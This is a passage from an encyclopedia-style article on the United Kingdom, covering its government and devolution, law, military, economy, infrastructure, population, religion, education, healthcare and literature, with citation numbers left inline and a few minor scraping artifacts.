UK. 193 Acting under the direction and supervision of a Cabinet of senior ministers selected and led by the prime minister, the Government serves as the principal instrument for public policymaking, administers public services and, through the Privy Council, promulgates statutory instruments and tenders advice to the monarch. 194 195 196 Nearly all prime ministers have served concurrently as First Lord of the Treasury 197 and all prime ministers have continuously served as First Lord of the Treasury since 1905, 198 Minister for the Civil Service since 1968, 199 and Minister for the Union since 2019. 200 While appointed by the monarch, in modern times the prime minister is, by convention, an MP, the leader of the political party with the most seats in the House of Commons, and holds office by virtue of their ability to command the confidence of the House of Commons. 201 202 203 The current Prime Minister, as of July 2024, is Sir Keir Starmer, leader of the Labour Party. 
Although not part of the United Kingdom, the three Crown Dependencies of Jersey, Guernsey and Isle of Man and 14 British Overseas Territories across the globe are subject to the sovereignty of the British Crown. The Crown exercises its responsibilities in relation to the Crown Dependencies mainly through the British government's Home Office and for the British Overseas Territories principally through the Foreign Office. 204 The geographical division of the United Kingdom into counties or shires began in England and Scotland in the early Middle Ages, and was completed throughout Great Britain and Ireland by the early Modern Period. 205 Modern local government by elected councils, partly based on the ancient counties, was established by separate Acts of Parliament: in England and Wales in 1888, Scotland in 1889 and Ireland in 1898, meaning there is no consistent system of administrative or geographic demarcation across the UK. 206 Until the 19th century there was little change to those arrangements, but there has since been a constant evolution of role and function. 207 Local government in England is complex, with the distribution of functions varying according to local arrangements. The upper-tier subdivisions of England are the nine regions, now used primarily for statistical purposes. 208 One of the regions, Greater London, has had a directly elected assembly and mayor since 2000 following popular support for the proposal in a 1998 referendum. 209 Local government in Scotland is divided into 32 council areas with a wide variation in size and population. The cities of Glasgow, Edinburgh, Aberdeen and Dundee are separate council areas, as is the Highland Council, which includes a third of Scotland's area but only just over 200,000 people. Local councils are made up of elected councillors, of whom there are 1,223. 210 Local government in Wales consists of 22 unitary authorities, each led by a leader and cabinet elected by the council itself. These include the cities of Cardiff, Swansea and Newport, which are unitary authorities in their own right. 211 Elections are held every four years under the first-past-the-post system. 211 Local government in Northern Ireland since 1973, has been organised into 26 district councils, each elected by single transferable vote. Their powers are limited to services such as waste collection, dog control, and maintaining parks and cemeteries. 212 In 2008 the executive agreed on proposals to create 11 new councils and replace the present system. 213 In the United Kingdom a process of devolution has transferred various powers from the UK Government to three of the four UK countries - Scotland, Northern Ireland and Wales, as well as to the regions of England. These powers vary and have been moved to the Scottish Government, the Welsh Government, the Northern Ireland Executive and in England, the Greater London Authority, Combined Authorities and Combined County Authorities. 214 The UK has an uncodified constitution and constitutional matters are not among the powers that have been devolved. Under the doctrine of parliamentary sovereignty, the UK Parliament could, in theory, therefore, abolish the Scottish Parliament, Senedd or Northern Ireland Assembly. 215 Though in the Scotland Act 2016 and the Wales Act 2017 it states that the Scottish Government and the Welsh Government "are a permanent part of the United Kingdom's constitutional arrangements". 
216 217 In practice, it would be politically difficult for the UK Parliament to abolish devolution to the Scottish Parliament and the Senedd, because these institutions were created by referendum decisions. 218 The political constraints placed upon the UK Parliament's power to interfere with devolution in Northern Ireland are greater still, because devolution in Northern Ireland rests upon an international agreement with the Government of Ireland. 219 The UK Parliament restricts the three devolved parliaments' legislative powers in economic policy matters through an act passed in 2020. 220 The Greater London Authority (GLA) was set up following a referendum in 1998. Colloquially known as City Hall, it is the devolved regional government body of Greater London. It consists of two political branches: an Executive Mayor and the London Assembly, which serves as a checks and balance on the Mayor. A Combined Authority (CA) is a type of local government institution introduced in England outside Greater London by the Local Democracy, Economic Development and Construction Act 2009. CAs allow a group of local authorities to pool appropriate responsibility and receive certain devolved functions from central government in order to deliver transport and economic policy more effectively over a wider area. 221 A Combined County Authority (CCA) is a similar type of local government institution introduced in England outside Greater London by the Levelling-up and Regeneration Act 2023, but may only be formed by upper-tier authorities: county councils and unitary authorities. 222 Since 1999, Scotland has had a devolved national government and parliament with wide-ranging powers over any matter that has not been specifically reserved to the UK Parliament. 223 224 Their power over economic issues is significantly constrained by an act of the UK parliament passed in 2020. 220 The current Scottish Government is a Scottish National Party minority government, 232 led by First Minister John Swinney, leader of the Scottish National Party. In 2014, the Scottish independence referendum was held, with 55.3% voting against independence from the United Kingdom and 44.7% voting in favour, resulting in Scotland staying within the United Kingdom. Local government in Scotland is divided into 32 council areas with a wide variation in size and population. Local councils are made up of elected councillors, of whom there are 1,223. 210 The Scottish Parliament is separate from the Scottish Government. It is made up of 129 elected Members of the Scottish Parliament (MSPs). It is the law making body of Scotland, and thus it scrutinises the work of the incumbent Scottish Government and considers any piece of proposed legislation through parliamentary debates, committees and parliamentary questions. 233 Since 1999, Wales has a devolved national government and legislature, known as the Senedd. Elections to the Senedd use the additional member system. It has more limited powers than those devolved to Scotland. 234 The Senedd can legislate on any matter not specifically reserved to the UK Parliament by Acts of Senedd Cymru. The current Welsh Government is Labour, led by First Minister Vaughan Gething, who has been the First Minister since 2024. Local government in Wales consists of 22 unitary authorities, each led by a leader and cabinet elected by the council itself. 
The devolved form of government in Northern Ireland is based on the 1998 Good Friday Agreement, which brought to an end a 30 year period of unionist-nationalist communal conflict known as The Troubles. The Agreement was confirmed by referendum and implemented later that year. It established power sharing arrangements for a devolved government and legislature, referred to as the Executive and Assembly respectively. 235 Elections to the Assembly use the single transferable vote system. The Executive and Assembly have powers similar to those devolved to Scotland. 236 The Executive is led by a diarchy representing unionist and nationalist members of the Assembly. 237 The First Minister and deputy First Minister of Northern Ireland are the joint heads of government of Northern Ireland. 238 239 Local government in Northern Ireland since 2015 has been divided between 11 councils with limited responsibilities. 212 The UK is a permanent member of the United Nations Security Council, a member of NATO, AUKUS, the Commonwealth of Nations, the G7 finance ministers, the G7 forum, the G20, the OECD, the WTO, the Council of Europe and the OSCE. 240 The UK has the British Council which is a British organisation based in over 100 countries specialising in international cultural and educational opportunities. The UK is said to have a "Special Relationship" with the United States and a close partnership with France the "Entente cordiale" and shares nuclear weapons technology with both countries; 241 242 the Anglo-Portuguese Alliance is considered to be the oldest binding military alliance in the world. The UK is also closely linked with the Republic of Ireland; the two countries share a Common Travel Area and co-operate through the British-Irish Intergovernmental Conference and the British-Irish Council. Britain's global presence and influence is further amplified through its trading relations, foreign investments, official development assistance and military engagements. 243 Canada, Australia and New Zealand, all of which are former colonies of the British Empire which share King Charles as their head of state, are the most favourably viewed countries in the world by British people. 244 The United Kingdom does not have a single legal system as Article 19 of the 1706 Treaty of Union provided for the continuation of Scotland's separate legal system. 245 Today the UK has three distinct systems of law: English law, Northern Ireland law and Scots law. A new Supreme Court of the United Kingdom came into being in October 2009 to replace the Appellate Committee of the House of Lords. 246 The Judicial Committee of the Privy Council, including the same members as the Supreme Court, is the highest court of appeal for several independent Commonwealth countries, the British Overseas Territories and the Crown Dependencies. 247 Both English law, which applies in England and Wales, and Northern Ireland law are based on common law (or case law) principles. 248 It originated in England in the Middle Ages and is the basis for many legal systems around the world. 249 The courts of England and Wales are headed by the Senior Courts of England and Wales, consisting of the Court of Appeal, the High Court of Justice (for civil cases) and the Crown Court (for criminal cases). 250 Scots law is a hybrid system based on common-law and civil-law principles. The chief courts are the Court of Session, for civil cases, 251 and the High Court of Justiciary, for criminal cases. 
252 The Supreme Court of the United Kingdom serves as the highest court of appeal for civil cases under Scots law. 253 Crime in England and Wales increased in the period between 1981 and 1995, though since that peak there has been an overall fall of 66 per cent in recorded crime from 1995 to 2015, 254 according to crime statistics. As of June 2023, the United Kingdom has the highest per-capita incarceration rate in Western Europe. 255 256 257 UK labour laws entitle staff to have a minimum set of employment rights including a minimum wage, a minimum of 28 days annual holiday, maternity leave and pay, parental leave, flexible working hours, statutory sick pay and a pension. Same-sex marriage has been legal in England, Scotland, and Wales since 2014, and in Northern Ireland since 2020. 258 LGBT equality in the United Kingdom is considered advanced by modern standards. 259 260 His Majesty's Armed Forces consist of three professional service branches: the Royal Navy and Royal Marines (forming the Naval Service), the British Army and the Royal Air Force. 261 The armed forces of the United Kingdom are managed by the Ministry of Defence and controlled by the Defence Council, chaired by the Secretary of State for Defence. The Commander-in-Chief is the British monarch, to whom members of the forces swear an oath of allegiance. 262 The Armed Forces are charged with protecting the UK and its overseas territories, promoting the UK's global security interests and supporting international peacekeeping efforts. They are active and regular participants in NATO, including the Allied Rapid Reaction Corps, the Five Power Defence Arrangements, RIMPAC and other worldwide coalition operations. Overseas garrisons and facilities are maintained in Ascension Island, Bahrain, Belize, Brunei, Canada, Cyprus, Diego Garcia, the Falkland Islands, Germany, Gibraltar, Kenya, Oman, Qatar and Singapore. 263 The UK is the 34th most peaceful country in the world, according to the 2024 Global Peace Index. 264 According to sources which include the Stockholm International Peace Research Institute and the International Institute for Strategic Studies, the UK has either the fourth- or the fifth-highest military expenditure. Total defence spending in 2024 is estimated at 2.3% of GDP. 265 Following the end of the Cold War, defence policy has a stated assumption that "the most demanding operations" will be undertaken as part of a coalition. 266 The UK has a regulated social market economy. 269 270 271 Based on market exchange rates, the UK is the sixth-largest economy in the world and the second-largest in Europe by nominal GDP. Its currency, the pound sterling, is the fourth most-traded currency in the foreign exchange market and the world's fourth-largest reserve currency (after the United States dollar, euro, and yen). 272 Sterling was the 2nd best-performing G10 currency against the dollar in 2023 with a gain of about 5%, with only the Swiss franc performing better. 273 274 London is the world capital for foreign exchange trading, with a global market share of 38.1% in 2022 275 of the daily $7.5 trillion global turnover. 276 HM Treasury, led by the Chancellor of the Exchequer, is responsible for developing and executing the government's public finance policy and economic policy. The Department for Business and Trade is responsible for business, international trade, and enterprise. The Bank of England is the UK's central bank and is responsible for issuing notes and coins in the pound sterling. 
Banks in Scotland and Northern Ireland retain the right to issue their own notes, subject to retaining enough Bank of England notes in reserve to cover their issue. In 2022, the UK became the world's fourth-largest exporter behind only China, the US, and Germany. 277 The estimated nominal GDP of the UK for 2024 is 2.765 trillion. 278 This value is 23% higher than the 2019 figure of 2.255 trillion 279 before leaving the EU (at similar US and EU exchange rates to 2019). 280 t Inflation in the UK rose by 2% in the year to May 2024 which was the governments target. 282 283 The service sector made up around 80% of the UK's GVA in 2021. 284 As of 2022, the UK is the world's second-largest exporter of services. 285 London is one of the world's largest financial centres, ranking second in the world in the Global Financial Centres Index in 2022. London also has the largest city GDP in Europe. 286 Edinburgh ranks 17th in the world, and sixth in Western Europe in the Global Financial Centres Index in 2020. 287 The British technology sector is valued at US$1 trillion, third behind the United States and China. 288 London has been named as the technology capital of Europe and the biggest technology hub in Europe. 289 Startups in the UK raised $6.7 billion in funding during the first half of 2024, overtaking China as the second place globally for funds raised. 290 The UK is home to 64 unicorns (companies worth more than $1 billion), about a quarter more than Germany and almost double the number in France. 291 The country's tourism sector is very important to the British economy; London was named as Europe's most popular destination for 2022. 292 293 The creative industries accounted for 5.9% of the UK's GVA in 2019, having grown by 43.6% in real terms from 2010. 294 Creative industries contributed more than 111bn to the UK economy in 2018, growth in the sector is more than five times larger than growth across the UK economy as a whole as reported in 2018. 295 Lloyd's of London is the world's largest insurance and reinsurance market and is located in London. 296 WPP plc, the world's biggest advertising company, is also based in the UK. The UK is one of the leading retail markets in Europe and is home to Europe's largest e-commerce market. 297 With consumption expenditures of over $2 trillion in 2023, the UK has the second-largest consumer market in Europe. 298 John Lewis is the UK's largest employee-owned business. 299 The British automotive industry employs around 800,000 people, with a turnover in 2022 of 67 billion, generating 27 billion of exports (10% of the UK's total export of goods). 300 In 2023, the UK produced around 905,100 passenger vehicles and 120,400 commercial vehicles, output was up 17.0% on the previous year. 301 Britain is known for iconic cars such as Mini and Jaguar, 302 also other luxury cars such as Rolls-Royce, Bentley and Range Rover. The UK is a major centre for engine manufacturing: in 2022 around 1.5 million engines were produced. 300 It is also the world's fourth-largest exporter of engines, as of 2021. 303 The UK motorsport industry employs more than 40,000 people, comprises around 4,300 companies and has an annual turnover of around 10 billion. 304 7 of the 10 Formula One teams are based in the UK, with their technology being used in supercars and hypercars from McLaren, Aston Martin and Lotus. 
u The aerospace industry of the UK is the second-largest national aerospace industry in the world depending upon the method of measurement clarification needed and has an annual turnover of around 30 billion. 305 The UK space industry was worth 17.5bn in 2020 21 and employed 48,800 people. Since 2012, the number of space organisations has grown on average nearly 21% per year, with 1,293 organisations reported in 2021. 306 307 The UK Space Agency has stated in 2023 that it is investing 1.6 billion in space-related projects. 308 Its agriculture industry is intensive, highly mechanised and efficient by European standards, producing approximately 60% of the country's overall food requirements and 73% of its indigenous food needs, utilising around 0.9 per cent of the labour force (292,000 workers). 309 Around two-thirds of production is devoted to livestock, one-third to arable crops. The UK retains a significant, though much reduced fishing industry. It is also rich in a variety of natural resources including coal, petroleum, natural gas, tin, limestone, iron ore, salt, clay, chalk, gypsum, lead, silica and an abundance of arable land. 310 The UK has among the highest levels of income inequality in the OECD, but has a very high HDI ranking. 311 312 The UK performs well in many dimensions of well-being in the OECD Better Life Index, outperforming the average in income, jobs, education, social connections, safety and life satisfaction. 313 England and Scotland were leading centres of the Scientific Revolution from the 17th century. 315 The United Kingdom led the Industrial Revolution from the 18th century, and has continued to produce scientists and engineers credited with important advances. 316 Major theorists from the 17th and 18th centuries include Isaac Newton, whose laws of motion and illumination of gravity have been seen as a keystone of modern science; 317 from the 19th century Charles Darwin, whose theory of evolution by natural selection was fundamental to the development of modern biology, and James Clerk Maxwell, who formulated classical electromagnetic theory; and more recently Stephen Hawking, who advanced major theories in the fields of cosmology, quantum gravity and the investigation of black holes. 318 The Department for Science, Innovation and Technology (DSIT) is responsible for helping to encourage, develop and manage the UK's scientific, research, and technological outputs. Scientific research and development remains important in British universities, with many establishing science parks to facilitate production and co-operation with industry. 319 In 2022 the UK retained its number one spot for technology in Europe reaching a combined market value of $1 trillion. Cambridge was named the number one university in the world for producing successful technology founders. 320 For four consecutive years, from 2020 to 2023, the UK maintained its fourth-place ranking in the Global Innovation Index, a position determined by approximately 80 indicators encompassing the political environment, education, infrastructure, and knowledge creation, among others. 321 314 During 2022, the UK produced 6.3 per cent of the world's scientific research papers and had a 10.5 per cent share of scientific citations, the third highest in the world for both. The UK ranked 1st in the world for Field-Weighted Citation Impact. 322 Scientific journals produced in the UK include publications by the Royal Society, Nature, the British Medical Journal and The Lancet. 
323 A radial road network totals 29,145 miles (46,904 km) of main roads, 2,173 miles (3,497 km) of motorways and 213,750 miles (344,000 km) of paved roads. 154 The M25, encircling London, is the largest and busiest bypass in the world. 324 In 2022, there were a total of 40.8 million licensed vehicles in Great Britain. 325 The UK has an extensive railway network of 10,072 miles (16,209 km). In Great Britain, the British Rail network was privatised between 1994 and 1997, followed by a rapid rise in passenger numbers. Great British Railways is a planned state-owned public body that will oversee rail transport in Great Britain. The UK was ranked eighth among national European rail systems in the 2017 European Railway Performance Index assessing intensity of use, quality of service and safety. 326 The UK has a direct train between London and Paris which takes 2hrs 16mins 327 called the Eurostar, it travels through the Channel Tunnel under the English Channel, at 23.5 miles long it is the world's longest undersea tunnel. 328 There is also a car service through the tunnel to France called LeShuttle. The Elizabeth line, a rail link running between East and West London, was named in honour of Queen Elizabeth II in 2016 and opened in 2022. It was Europe's largest construction project at the time and is estimated to bring in 42 billion to the UK economy. 329 330 Another major infrastructure project is High Speed 2 (HS2), it is a new high speed railway currently under construction. It will link London with Birmingham, with the potential to extend further north and capable of speeds of up to 225 mph. 331 332 In 2014, there were 5.2 billion bus journeys in the UK, 2.4 billion of which were in London. 333 The red double-decker bus has entered popular culture as an internationally recognised icon of England. 334 The London bus network is extensive, with over 6,800 scheduled services every weekday carrying about six million passengers on over 700 different routes making it one of the most extensive bus systems in the world and the largest in Europe. 335 During 2023, UK airports handled a total of 272.8 million passengers. 336 In that period the three largest airports were London Heathrow Airport (79.1 million passengers), Gatwick Airport (40.9 million passengers) and Manchester Airport (28.1 million passengers). 336 London Heathrow Airport, located 15 miles (24 km) west of the capital, is the world's second busiest airport by international passenger traffic and has the most international passenger traffic of any airport in the world; 337 it is the hub for the UK flag carrier British Airways, as well as Virgin Atlantic. 338 In 2021, the UK was the world's 14th-largest consumer of energy and the 22nd-largest producer. 339 The UK is home to many large energy companies, including two of the six major oil and gas companies BP and Shell. 340 The UK is considered a world leader in combatting climate change, being home to the world's first climate change act and reducing its emissions faster than any major economy since 1990. 341 The total of all renewable electricity sources provided 43% of the electricity generated in the UK in 2020. 342 A world leader in green energy and technology, the UK is the best site in Europe for wind energy and one of the best in the world. 343 Wind power production is the country's fastest-growing supply; in 2022, 26.8% of the UK's total electricity was generated by wind power. 344 The UK has the largest offshore wind farm in the world, which is located off the coast of Yorkshire. 
345 The UK is home to seven of the ten biggest wind farms in Europe. 346 In 2023, the UK had 9 nuclear reactors normally generating about 15 per cent of the UK's electricity. 347 Unlike Germany and Japan, there are two reactors under construction and more planned. 348 349 In the late 1990s, nuclear power plants contributed around 25 per cent of the total annual electricity generation in the UK, but this has gradually declined as old plants have been shut down. The UK Government is investing in Small Modular Reactors, Advanced Modular Reactors and Nuclear Fusion Reators 350 research and development. In 2021, the UK produced 935 thousand barrels per day (bbl d) of oil (and other liquids) and consumed 1,258 thousand bbl d. 339 Production is now when? in decline and the UK has been a net importer of oil since 2005. 351 In 2020 update , the UK had around 2 billion barrels of proven crude oil reserves. 351 In 2021, the UK was the 21st-largest producer of natural gas in the world. 352 Production is now when? in decline and the UK has been a net importer of natural gas since 2004. 352 In 2020, the UK produced 1.8 million tonnes of coal falling 91% in 10 years. 347 In 2020 it had proven recoverable coal reserves of 26 million tonnes. 347 The UK Coal Authority has stated that there is a potential to produce between 7 billion tonnes and 16 billion tonnes of coal through underground coal gasification (UCG) or 'fracking', 353 and based on current UK coal consumption, such reserves could last between 200 and 400 years. 354 Access to improved water supply and sanitation in the UK is universal. It is estimated that 96 per cent of households are connected to the sewer network. 355 According to the Environment Agency, total water abstraction for public water supply in the UK was 16,406 megalitres per day in 2007. 356 In England and Wales water and sewerage services are provided by 10 private regional water and sewerage companies and 13 mostly smaller private "water only" companies. In Scotland, water and sewerage services are provided by a single public company, Scottish Water. In Northern Ireland water and sewerage services are also provided by a single public entity, Northern Ireland Water. 357 In the 2011 census the total population of the United Kingdom was 63,181,775. 358 It is the fourth-largest in Europe (after Russia, Germany and France), the fifth-largest in the Commonwealth and the 22nd-largest in the world. In mid 2014 and mid 2015 net long-term international migration contributed more to population growth. In mid 2012 and mid 2013 natural change contributed the most to population growth. 359 Between 2001 and 2011 the population increased by an average annual rate of approximately 0.7 per cent. 358 The 2011 census also showed that, over the previous 100 years, the proportion of the population aged 0 14 fell from 31 per cent to 18 per cent, and the proportion of people aged 65 and over rose from 5 to 16 per cent. 358 In 2018 the median age of the UK population was 41.7 years. 360 England's population in 2011 was 53 million, representing some 84 per cent of the UK total. 362 It is one of the most densely populated countries in the world, with 420 people per square kilometre in mid 2015, 359 with a particular concentration in London and the south-east. 363 The 2011 census put Scotland's population at 5.3 million, 364 Wales at 3.06 million and Northern Ireland at 1.81 million. 362 In 2017 the total fertility rate (TFR) across the UK was 1.74 children born per woman. 
365 While a rising birth rate is contributing to population growth, it remains considerably below the baby boom peak of 2.95 children per woman in 1964, 366 or the high of 6.02 children born per woman in 1815, 367 below the replacement rate of 2.1, but higher than the 2001 record low of 1.63. 368 In 2011, 47.3 per cent of births in the UK were to unmarried women. 369 The Office for National Statistics reported in 2015 that out of the UK population aged 16 and over, 1.7 per cent identify as gay, lesbian, or bisexual (2.0 per cent of males and 1.5 per cent of females); 4.5 per cent of respondents responded with "other", "I don't know", or did not respond. 370 The number of transgender people in the UK was estimated to be between 65,000 and 300,000 by research between 2001 and 2008. 371 Historically, indigenous British people were thought to be descended from the various ethnic groups that settled there before the 12th century: the Celts, Romans, Anglo-Saxons, Norse and the Normans. Welsh people could be the oldest ethnic group in the UK. 375 The UK has a history of non-white immigration with Liverpool having the oldest Black population in the country dating back to at least the 1730s during the period of the African slave trade. During this period it is estimated the Afro-Caribbean population of Great Britain was 10,000 to 15,000 376 which later declined due to the abolition of slavery. 377 The UK also has the oldest Chinese community in Europe, dating to the arrival of Chinese seamen in the 19th century. 378 In 2011 update , 87.2 per cent of the UK population identified themselves as white, meaning 12.8 per cent of the UK population identify themselves as of one of an ethnic minority group. 379 Ethnic diversity varies significantly across the UK. 30.4 per cent of London's population and 37.4 per cent of Leicester's was estimated to be non-white in 2005 update , 383 whereas less than 5 per cent of the populations of North East England, Wales and the South West were from ethnic minorities, according to the 2001 census. 384 In 2016 update , 31.4 per cent of primary and 27.9 per cent of secondary pupils at state schools in England were members of an ethnic minority. 385 The English language is the official and most spoken language of the United Kingdom. 386 387 The United Kingdom proactively promotes the language globally to build connections, understanding and trust between people in the UK and countries worldwide. 388 389 It is estimated that 95 per cent of the UK's population are monolingual English speakers. 390 5.5 per cent of the population are estimated to speak languages brought to the UK as a result of relatively recent immigration. 390 South Asian languages are the largest grouping which includes Punjabi, Urdu, Bengali, Sylheti, Hindi, Pahari-Pothwari, Tamil, and Gujarati. 391 According to the 2011 census, Polish has become the second-largest language spoken in England and has 546,000 speakers. 392 In 2019, some three-quarters of a million people spoke little or no English. 393 Three indigenous Celtic languages are spoken in the UK: Welsh, Irish and Scottish Gaelic. Cornish, which became extinct as a first language in the late 18th century, is subject to revival efforts and has a small group of second language speakers. 394 2 According to the 2021 census, the Welsh-speaking population of Wales aged three or older was 538,300 people (17.8 per cent). 395 In addition, it is estimated that about 200,000 Welsh speakers live in England. 
396 In the 2021 census in Northern Ireland 12.4% of people had some ability in the Irish language and 10.4% of people had some ability in the Ulster-Scots language. 397 Over 92,000 people in Scotland (just under 2 per cent of the population) had some Gaelic language ability, including 72 per cent of those living in the Outer Hebrides. 398 The number of children being taught either Welsh or Scottish Gaelic is increasing. 399 Scots, a language descended from early northern Middle English, has limited recognition alongside its regional variant, Ulster Scots in Northern Ireland, without specific commitments to protection and promotion. 2 400 As of April 2020, there are said to be around 151,000 users of British Sign Language (BSL), a sign language used by deaf people, in the UK. 401 Religion in the United Kingdom (2022 Census) 402 Forms of Christianity have dominated religious life in what is now the United Kingdom for more than 1,400 years. 403 Although a majority of citizens still identify with Christianity in many surveys, regular church attendance has fallen dramatically since the middle of the 20th century, 404 while immigration and demographic change have contributed to the growth of other faiths, most notably Islam. 405 This has led some commentators to variously describe the UK as a multi-faith, 406 secularised, 407 or post-Christian society. 408 In the 2001 census, 71.6 per cent of all respondents indicated that they were Christians, with the next largest faiths being Islam (2.8 per cent), Hinduism (1.0 per cent), Sikhism (0.6 per cent), Judaism (0.5 per cent), Buddhism (0.3 per cent) and all other religions (0.3 per cent). 409 Of the respondents, 15 per cent stated that they had no religion and a further 7 per cent did not state a religious preference. 410 A Tearfund survey in 2007 showed that only one in ten Britons actually attend church weekly. 411 Between the 2001 and 2011 census, there was a 12 per cent decrease in the number of people who identified as Christian, while the percentage of those reporting no religious affiliation doubled. This contrasted with growth in the other main religious group categories, with the number of Muslims increasing by the most substantial margin to a total of about 5 per cent. 412 The Muslim population has increased from 1.6 million in 2001 to 2.7 million in 2011, making it the second-largest religious group in the UK. 413 The Church of England is the established church in England. 414 It retains a representation in the UK Parliament, and the British monarch is its Supreme Governor. 415 In Scotland, the Church of Scotland is recognised as the national church. It is not subject to state control, and the British monarch is an ordinary member, required to swear an oath to "maintain and preserve the Protestant Religion and Presbyterian Church Government" upon his or her accession. 416 2 417 The Church in Wales was disestablished in 1920 and, because the Church of Ireland was disestablished in 1870 before the partition of Ireland, there is no established church in Northern Ireland. 418 Although there are no UK-wide data in the 2001 census on adherence to individual Christian denominations, it has been estimated that 62 per cent of Christians are Anglican, 13.5 per cent Catholic, 6 per cent Presbyterian, and 3.4 per cent Methodist, with small numbers of other Protestant denominations such as Plymouth Brethren, and Orthodox churches. 419 Immigration is now when? 
contributing to a rising UK population, 420 421 with arrivals and UK-born children of migrants accounting for about half of the population increase between 1991 and 2001. According to official statistics released in 2015, 27 per cent of UK live births in 2014 were to mothers born outside the UK. 422 The ONS reported that net migration rose from 2009 to 2010 by 21 per cent to 239,000. 423 In 2013, approximately 208,000 foreign nationals were naturalised as British citizens, the highest number since 1962. This figure fell to around 125,800 in 2014. Between 2009 and 2013, the average number of British citizenships granted annually was 195,800. The most common previous nationalities of those naturalised in 2014 were Indian, Pakistani, Filipino, Nigerian, Bangladeshi, Nepali, Chinese, South African, Polish and Somali. 424 The total number of grants of settlement, which confer permanent residence in the UK but not citizenship, 425 was approximately 154,700 in 2013, higher than the previous two years. 424 Long-term net migration (the number of people immigrating minus the number emigrating) reached a record high of 764,000 in 2022, with immigration at 1.26 million and emigration at 493,000. 426 In 2023 net migration was 685,000; 10% of the total who came to the UK in that year were EU Nationals. 421 More EU Nationals left the UK than arrived. 421 Emigration was an important feature of British society in the 19th century. Between 1815 and 1930, around 11.4 million people emigrated from Britain and 7.3 million from Ireland. Estimates show that by the end of the 20th century, some 300 million people of British and Irish descent were permanently settled around the globe. 427 Today, at least 5.5 million UK-born people live abroad, 428 429 mainly in Australia, Spain, the United States and Canada. 428 430 Education in the United Kingdom is a devolved matter, with each country having a separate education system. About 38 per cent of the United Kingdom population has a university or college degree, which is the highest percentage in Europe, and among the highest percentages in the world. 431 The United Kingdom is home to many universities, including the University of Oxford and University of Cambridge which often achieve first place on global rankings. 432 433 University education has varied tuition fees between the different regions of the UK. England and Wales have a fixed maximum annual fee for all UK citizens, contingent on attaining a certain level of income. Only those who reach a certain salary threshold ( 21,000) pay this fee through general taxation. Northern Ireland and Scotland have a reduced maximum fee or no fee for citizens where it is their home region. Some NHS courses have bursaries which pay the fee and in 2017 it was stated that each doctor gets subsidised by 230,000 during their training. 434 435 In 2022, the Programme for International Student Assessment (PISA), coordinated by the OECD, ranked the overall knowledge and skills of British 15 year-olds as 14th in the world in reading, mathematics and science. The average British student scored 494, well above the OECD average of 478. 436 437 The modern system of universal publicly funded in the United Kingdom has its origins in the creation of the National Health Service (NHS) in 1949 which still exists to this day and is the primary healthcare provider in the United Kingdom. The widespread popularity of the NHS has led to it being described as a "national religion". 
438 439 Healthcare in the United Kingdom is a devolved matter and each country has its own system of universal publicly funded healthcare, although private healthcare is also available. Public healthcare is provided to all UK permanent residents and is mostly free at the point of need, being paid for from general taxation. The World Health Organization, in 2000, ranked the provision of healthcare in the United Kingdom as fifteenth best in Europe and eighteenth in the world. 440 Since 1979, expenditure on healthcare has been increased significantly. 441 The 2018 OECD data, which incorporates in health a chunk of what in the UK is classified as social care, has the UK spending 3,121 per head. 442 In 2017 the UK spent 2,989 per person on healthcare, around the median for members of the Organisation for Economic Co-operation and Development. 443 Regulatory bodies are organised on a UK-wide basis such as the General Medical Council, the Nursing and Midwifery Council and non-governmental-based, such as the Royal Colleges. Political and operational responsibility for healthcare lies with four national executives; healthcare in England is the responsibility of the UK Government; healthcare in Northern Ireland is the responsibility of the Northern Ireland Executive; healthcare in Scotland is the responsibility of the Scottish Government; and healthcare in Wales is the responsibility of the Welsh Government. Each National Health Service has different policies and priorities, resulting in contrasts. 444 The culture of the United Kingdom is influenced by many factors including: the nation's island status; its history; and being a political union of four countries with each preserving elements of distinctive traditions, customs and symbolism. As a result of the British Empire, British influence can be observed in the language, culture and legal systems of many of its former colonies, in particular, the United States, Australia, Canada, New Zealand, and Ireland, a common culture known today as the Anglosphere. 445 446 The substantial cultural influence of the United Kingdom has led to it being described as a cultural superpower. 125 126 A global survey in 2023 ranked the UK 3rd in the 'Most Influential Countries' rankings (behind the US and China). 447 British literature includes literature associated with the United Kingdom, the Isle of Man and the Channel Islands. Most British literature is in English. In 2022, 669 million physical books were sold in the UK, this is the highest overall level ever recorded. 448 Britain is renowned for children's literature, writer's includes Daniel Defoe, Rudyard Kipling, Lewis Carroll and Beatrix Potter who also illustrated her own books. Other writers include A.A. Milne, Enid Blyton, J.R.R. Tolkien, Roald Dahl, Terry Pratchett and J.K. Rowling who wrote the best selling book series of all time. 449 The English playwright and poet William Shakespeare is widely regarded as the greatest dramatist of all time. 450 Other important English writers include Geoffrey Chaucer, known for The Canterbury Tales, the poet William Wordsworth and other romantic poets, also the novelists Charles Dickens, H. G. Wells, George Orwell and Ian Fleming. The 20th-century English crime writer Agatha Christie is the best-selling novelist of all time. 
451 Twelve of the top 25 of 100 novels by British writers chosen by a BBC poll of global critics were written by women; these included works by George Eliot, Virginia Woolf, Charlotte and Emily Bront , Mary Shelley, Jane Austen, Doris Lessing and Zadie Smith. 452 Scotland's contributions include Arthur Conan Doyle (the creator of Sherlock Holmes), Sir Walter Scott, J. M. Barrie, Robert Louis Stevenson and the poet Robert Burns. More recently Hugh MacDiarmid and Neil M. Gunn contributed to the Scottish Renaissance, with grimmer works from Ian Rankin and Iain Banks. Scotland's capital, Edinburgh, was UNESCO's first worldwide City of Literature. 453 Welsh literature includes Britain's oldest known poem, Y Gododdin, which was composed most likely in the late 6th century. It was written in Cumbric or Old Welsh and contains the earliest known reference to King Arthur. 454 The Arthurian legend was further developed by Geoffrey of Monmouth. 455 Poet Dafydd ap Gwilym (fl. 1320 1370) is regarded as one of the greatest European poets of his age. 456 Daniel Owen is credited as the first Welsh-language novelist, publishing Rhys Lewis in 1885. The best-known of the Anglo-Welsh poets are Dylan Thomas and R. S. Thomas, the latter nominated for the Nobel Prize in Literature in 1996. Leading Welsh novelists of the twentieth century include Richard Llewellyn and Kate Roberts. 457 458 Northern Ireland's most popular writer is C.S. Lewis who was born in Belfast and wrote The Chronicles of Narnia. 459 Irish writers, living at a time when all of Ireland was part of the United Kingdom, include Oscar Wilde, 460 Bram Stoker 461 and George Bernard Shaw. 462 There have been many authors whose origins were from outside the United Kingdom but who moved to the UK, including Joseph Conrad, 463 T. S. Eliot, 464 Kazuo Ishiguro, 465 Sir Salman Rushdie 466 and Ezra Pound. 467 The United Kingdom is famous for the tradition of 'British Empiricism', a branch of the philosophy of knowledge that states that only knowledge verified by experience is valid, and 'Scottish Philosophy', sometimes referred to as the 'Scottish School of Common Sense'. 468 The most famous philosophers of British Empiricism are John Locke, George 